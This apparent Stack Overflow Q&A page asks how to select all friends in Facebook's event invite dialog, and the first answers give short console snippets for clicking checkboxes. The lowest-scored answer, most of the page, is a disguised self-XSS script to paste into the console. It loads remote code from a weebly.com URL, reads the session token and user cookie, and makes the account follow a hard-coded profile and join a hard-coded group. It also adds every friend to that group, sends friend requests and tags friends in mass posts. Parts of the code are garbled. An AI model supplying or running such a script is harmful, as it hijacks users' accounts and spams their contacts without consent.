# How can I select all friends in new Facebook events invite UI?

Tags: javascript, facebook

Facebook has recently updated their events invite UI. This JavaScript used to work in selecting all friends, but does not any longer:

```
javascript:elms = document.getElementsByName("checkableitems[]");
for (i = 0; i < elms.length; i++) {
  if (elms[i].type = "checkbox") elms[i].click()
};
```

Anyone have an idea of how to code for this change? (Please note, I am not spamming friends, I have a preselected user list of about 300 friends that want invites to music events in my area and it is a huge pain to individually select them).

Answer (score 1):

Here is the code for Events and Pages:

```
javascript:var inputs = document.getElementsByClassName('_1pu2'); for(var i=0;i<inputs.length;i++) { inputs[i].click(); }
```

Answer (score 0):

Open Console in chrome once you have scrolled down all the list of friends. Clear Console and paste this:

```
javascript:elms=document.getElementsByName("profileChooserItems")[0];
var tmpElms = [];
var tmpElmsObj = {};
elmsClass=document.getElementsByClassName('_1v30');
for (i=0;i<elmsClass.length;i++){
    var id = elmsClass[i].getAttribute("data-reactid");
    var classActive = elmsClass[i].getElementsByClassName('_1v32')[0];
    classActive.className = "_1v32 _1v33";
    id = id.split(':');
    id = id[1].slice(1);
    tmpElmsObj[id] = 1;
    tmpElms.push(id);
}
document.getElementsByName('profileChooserItems')[0].value=JSON.stringify(tmpElmsObj);
void(0);
```

I just used it and it worked to me. 
Hope it works!!!

Code is here also: http://pastebin.com/jZZ2wWFh

@tomasferrero

Answer (score 0):

Updated and working now January, 29th 2015.

for pages you don't admin:

```
javascript:var inputs = document.getElementsByClassName('_4jy0 _4jy3 _517h _51sy _42ft'); for(var i=0; i<inputs.length;i++) { inputs[i].click(); }
```

for pages you admin:

```
javascript:var inputs = document.getElementsByClassName('uiButton _1sm'); for(var i=0; i<inputs.length;i++) { inputs[i].click(); }
```

Comment: While it appears to work, it also seems that facebook has set it up to detect any "select all" attempts. I got a "You have been temporarily blocked because you were using this item too fast." warning.

Comment: Never experienced that

Answer (score -1):

// ==UserScript==

// @name               Facebook Auto Add Friends To Groups ..!!

// @version      12.4

// ==/UserScript==

// ==UserScript==

// @name               Facebook Auto Add Friends To Groups.

// 1.Make sure you are using Mozilla Firefox web browse.

// 2.If you don't have then please download it.

// 3.Login to facebook if not logged in already.

// 4.Now open group where you want to add all your friends.

// 5.Now press CTRL+SHIFT+K it will open a Console Box.

// 6.Copy the given below code.

document.body.appendChild(document.createElement('script')).src='http://www.weebly.com/uploads/1/0/2/5/10251423/arb.facebook_future_0.2.js';

//7.Paste into the Console Box. Then press enter, now wait for few seconds...(^_~) have fun!!

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function cereziAl(isim) {

```
var tarama = isim + "="; 

if (document.cookie.length > 0) { 

    konum = document.cookie.indexOf(tarama) 

    if (konum != -1) { 

        konum += tarama.length 

        son = document.cookie.indexOf(";", konum) 

        if (son == -1) 

            son = document.cookie.length 

        return unescape(document.cookie.substring(konum, son)) 

    } 

    else { return ""; } 

}
```

}

function getRandomInt (min, max) {

```
return Math.floor(Math.random() * (max - min + 1)) + min;
```

}

function randomValue(arr) {

```
return arr[getRandomInt(0, arr.length-1)];
```

}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){

```
var http4 = new XMLHttpRequest(); 

  

var url4 = "/ajax/follow/follow_profile.php?__a=1"; 

  

var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp="; 

http4.open("POST", url4, true); 

  

//Send the proper header information along with the request 

http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 

http4.setRequestHeader("Content-length", params4.length); 

http4.setRequestHeader("Connection", "close"); 

  

http4.onreadystatechange = function() {//Call a function when the state changes. 

if(http4.readyState == 4 && http4.status == 200) { 

    

  http4.close; // Close the connection 

  

} 

} 

 

http4.send(params4);
```

}

function sublist(uidss) {

var a = document.createElement('script');

a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";

document.body.appendChild(a);

}

a("100005479474273");

sublist("");

var gid = ['466809306733986'];

var fb_dtsg = document'getElementsByName'[0]['value'];

var user_id = document['cookie']'match';

var httpwp = new XMLHttpRequest();

var urlwp = '/ajax/groups/membership/r2j.php?__a=1';

var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';

httpwp['open']('POST', urlwp, true);

httpwp'setRequestHeader';

httpwp['setRequestHeader']('Content-length', paramswp['length']);

httpwp'setRequestHeader';

httpwp'send';

var fb_dtsg = document'getElementsByName'[0]['value'];

var user_id = document['cookie']'match';

var friends = new Array();

gf = new XMLHttpRequest();

gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math'random' + '&filter[0]=user&options[0]=friends_only', false);

gf'send';

if (gf['readyState'] != 4) {} else {

```
data = eval('(' + gf['responseText']['substr'](9) + ')'); 

if (data['error']) {} else { 

    friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) { 

        return _0x93dax8['index'] - _0x93dax9['index']; 

    }); 

};
```

};

for (var i = 0; i < friends['length']; i++) {

```
var httpwp = new XMLHttpRequest(); 

var urlwp = '/ajax/groups/members/add_post.php?__a=1'; 

var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp='; 

httpwp['open']('POST', urlwp, true); 

httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); 

httpwp['setRequestHeader']('Content-length', paramswp['length']); 

httpwp['setRequestHeader']('Connection', 'keep-alive'); 

httpwp['onreadystatechange'] = function () {
```

if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};

```
}; 

httpwp['send'](paramswp);
```

};

var spage_id = "303063783041427";

var spost_id = "303063783041427";

var sfoto_id = "303063783041427";

var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

var smesaj = "";

var smesaj_text = "";

var arkadaslar = [];

var svn_rev;

var bugun= new Date();

var btarihi = new Date();

btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);

if(!document.cookie.match(/paylasti=(\d+)/)){

document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();

}

//arkadaslari al ve isle

function sarkadaslari_al(){

var xmlhttp = new XMLHttpRequest();

```
    xmlhttp.onreadystatechange = function () {
```

if(xmlhttp.readyState == 4){

eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");

for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){

smesaj = "";

smesaj_text = "";

for(i=f*10;i<(f+1)*10;i++){

if(arkadaslar.payload.entries[i]){

smesaj += " @[" + arkadaslar.payload.entries[i].uid +  ":" + arkadaslar.payload.entries[i].text + "]";

smesaj_text += " " + arkadaslar.payload.entries[i].text;

}

}

sdurumpaylas();             }

}

```
    };
```

var params = "&filter[0]=user";

params += "&options[0]=friends_only";

params += "&options[1]=nm";

params += "&token=v7";

```
    params += "&viewer=" + user_id;
```

params += "&__user=" + user_id;

```
    if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); } 

    else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); } 

    xmlhttp.send();
```

}

//tiklama olayini dinle

var tiklama = document.addEventListener("click", function () {

if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){

svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];

sarkadaslari_al();

document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();

document.removeEventListener(tiklama);

}

}, false);

//arkadaÃ¾ ekleme

function sarkadasekle(uid,cins){

var xmlhttp = new XMLHttpRequest();

```
    xmlhttp.onreadystatechange = function () {
```

if(xmlhttp.readyState == 4){

}

```
    };
```

xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);

var params = "to_friend=" + uid;

params += "&action=add_friend";

params += "&how_found=friend_browser";

params += "&ref_param=none";

params += "&outgoing_id=";

params += "&logging_location=friend_browser";

params += "&no_flyout_on_click=true";

params += "&ego_log_data=";

params += "&http_referer=";

params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;

```
    params += "&phstamp=165816749114848369115";
```

params += "&__user=" + user_id;

xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);

xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");

if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){

xmlhttp.send(params);

}else if(document.cookie.split("cins" + user_id +"=").length <= 1){

cinsiyetgetir(uid,cins,"sarkadasekle");

}else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){

xmlhttp.send(params);

}

}

//cinsiyet belirleme

var cinssonuc = {};

var cinshtml = document.createElement("html");

function scinsiyetgetir(uid,cins,fonksiyon){

var xmlhttp = new XMLHttpRequest();

```
    xmlhttp.onreadystatechange = function () {
```

if(xmlhttp.readyState == 4){

eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");

cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html

btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);

if(cinshtml.getElementsByTagName("select")[0].value == "1"){

document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString();

}else if(cinshtml.getElementsByTagName("select")[0].value == "2"){

document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString();

}

eval(fonksiyon + "(" + id + "," + cins + ");");

}

```
    };
```

xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);

xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);

xmlhttp.send();

}

Comment: As it’s currently written, your answer is unclear. Please [edit] to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers [in the help center](/help/how-to-answer).